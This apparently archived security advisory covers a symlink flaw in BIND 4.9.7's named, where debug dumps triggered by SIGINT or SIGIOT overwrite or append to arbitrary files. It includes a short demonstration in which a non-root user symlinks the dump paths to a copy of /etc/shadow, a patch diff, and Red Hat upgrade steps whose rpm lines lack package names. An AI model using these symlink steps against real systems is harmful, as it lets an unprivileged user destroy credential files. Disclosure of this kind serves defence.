

    Systems running BIND 4.9.7


    Joe H. found following.  The new named(8) happily follows symlinks
    and clobbers any file  on the system when  it receives a   SIGINT.
    (Used for  debugging and  statistics gathering)  SIGINT dumps  the
    named database  to /var/tmp/named_dump.db.   It will  also happily
    append data to any system file when it receives a SIGIOT.   SIGIOT
    appends named statistics to /var/tmp/named.stats.  This problem is
    probably recursive to  previous versions of  named but, it  is not
    confirmed.  This was tested under RedHat 4.2 Linux 2.0.30 i586.

    The in.named(8)  man page  mentions that  sending a  SIGINT to the
    in.named process will dump the current data base and cache to,  by
    default, /var/tmp/named_dump.db.  Some sites may find this  useful
    in  looking   for  self-referential   CNAMEs.    Please  see   the
    in.named(8) man page for further details.  Quick check shows:

	[root]# cp /etc/shadow /etc/junk.shadow
	[root]# ls -l /etc/junk.shadow
	-r--------   1 root     root          992 Apr 10 12:52 junk.shadow

    Now as a non-priv user..

	[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
	[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
	[Luser]# logout

    (Now if  ever root  sends a  SIGINT or  SIGIOT /etc/junk.shadow is

	[root]# kill -SIGIOT []

	[root]# ls -al /etc/junk.shadow
	-r--------   1 root     root         2251 Apr 10 13:00 /etc/junk.shadow

	[root]# less /etc/junk.shadow

		someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
		nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
		+++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
		2368    time since boot (secs)
		2368    time since reset (secs)
		0       Unknown query types

    The statistics dump gets appended to any file on the system.   Now
    for the real horror:

	[root]# kill -SIGINT []
	[root]# ls -l /etc/junk.shadow
	-r--------   1 root     root         5249 Apr 10 13:02 /etc/junk.shadow
	[root]# less /etc/junk.shadow

		; Dumped at Fri Apr 10 13:02:40 1998
		;; ++zone table++

    No trace of  the original remains.   Your shadow password  file or
    anything else on the system is fried.


    Since 4.9.7 is a security related patch anyway, this will be fixed
    before  declaring  4.9.7-REL.   Mark  Andrews  posted  patch  that
    addresses the issues and a few  others by change 4.9.7 to do  what
    8.1.x does, i.e. use  to directory specified in  named.{boot,conf}
    for temporaries and debug dumps:

    *** named/ns_init.c.000 Mon Jun  2 06:34:35 1997
    --- named/ns_init.c     Sun Apr 12 13:12:05 1998
    *** 560,567 ****
				     * We will always transfer this zone again
				     * after a reload.
    !                               sprintf(buf, "%s/NsTmp%ld.%d", _PATH_TMPDIR,
    !                                       (long)getpid(), tmpnum++);
				    source = savestr(buf);
				    zp->z_flags |= Z_TMP_FILE;
			    } else
    --- 560,567 ----
				     * We will always transfer this zone again
				     * after a reload.
    !                               sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
    !                                       tmpnum++);
				    source = savestr(buf);
				    zp->z_flags |= Z_TMP_FILE;
			    } else
    *** named/ns_main.c.000 Mon Jun  2 06:34:36 1997
    --- named/ns_main.c     Sun Apr 12 14:51:45 1998
    *** 1463,1469 ****
	    dprintf(1, (ddt, "sigprof()\n"));
	    if (fork() == 0)
    -               (void) chdir(_PATH_TMPDIR);
	    errno = save_errno;
    --- 1463,1468 ----
    *** named/pathnames.h.000       Thu Dec 15 17:24:22 1994
    --- named/pathnames.h   Sat Apr 11 10:57:45 1998
    *** 74,88 ****
      #ifndef _PATH_XFER
      # define _PATH_XFER   "/usr/libexec/named-xfer"
    ! #define       _PATH_DEBUG     "/var/tmp/"
    ! #define       _PATH_DUMPFILE  "/var/tmp/named_dump.db"
      #ifndef _PATH_PIDFILE
      # define _PATH_PIDFILE        "/var/run/"
    ! #define       _PATH_STATS     "/var/tmp/named.stats"
    ! #define       _PATH_XFERTRACE "/var/tmp/xfer.trace"
    ! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
    ! #define       _PATH_TMPXFER   "/var/tmp/xfer.ddt.XXXXXX"
      #define       _PATH_TMPDIR    "/var/tmp"

      #else /* BSD */
    --- 74,88 ----
      #ifndef _PATH_XFER
      # define _PATH_XFER   "/usr/libexec/named-xfer"
    ! #define       _PATH_DEBUG     ""
    ! #define       _PATH_DUMPFILE  "named_dump.db"
      #ifndef _PATH_PIDFILE
      # define _PATH_PIDFILE        "/var/run/"
    ! #define       _PATH_STATS     "named.stats"
    ! #define       _PATH_XFERTRACE "xfer.trace"
    ! #define _PATH_XFERDDT "xfer.ddt"
    ! #define       _PATH_TMPXFER   "xfer.ddt.XXXXXX"
      #define       _PATH_TMPDIR    "/var/tmp"

      #else /* BSD */
    *** 92,106 ****
      #ifndef _PATH_XFER
      # define _PATH_XFER   "/etc/named-xfer"
    ! #define       _PATH_DEBUG     "/usr/tmp/"
    ! #define       _PATH_DUMPFILE  "/usr/tmp/named_dump.db"
      #ifndef _PATH_PIDFILE
      # define _PATH_PIDFILE        "/etc/"
    ! #define       _PATH_STATS     "/usr/tmp/named.stats"
    ! #define       _PATH_XFERTRACE "/usr/tmp/xfer.trace"
    ! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
    ! #define       _PATH_TMPXFER   "/usr/tmp/xfer.ddt.XXXXXX"
      #define       _PATH_TMPDIR    "/usr/tmp"
      #endif /* BSD */

    --- 92,106 ----
      #ifndef _PATH_XFER
      # define _PATH_XFER   "/etc/named-xfer"
    ! #define       _PATH_DEBUG     ""
    ! #define       _PATH_DUMPFILE  "named_dump.db"
      #ifndef _PATH_PIDFILE
      # define _PATH_PIDFILE        "/etc/"
    ! #define       _PATH_STATS     "named.stats"
    ! #define       _PATH_XFERTRACE "xfer.trace"
    ! #define _PATH_XFERDDT "xfer.ddt"
    ! #define       _PATH_TMPXFER   "xfer.ddt.XXXXXX"
      #define       _PATH_TMPDIR    "/usr/tmp"
      #endif /* BSD */

    These problems affect users of Red Hat 4.2, 5.0, and 5.1. Red  Hat
    strongly suggests all users update  to these new versions as  soon
    as possible.  After upgrading to the new version of bind, be  sure
    to restart bind with:

        /etc/rc.d/init.d/bind stop
        /etc/rc.d/init.d/bind start

    rpm -Uvh
    rpm -Uvh
    rpm -Uvh

    rpm -Uvh
    rpm -Uvh

    rpm -Uvh
    rpm -Uvh
    rpm -Uvh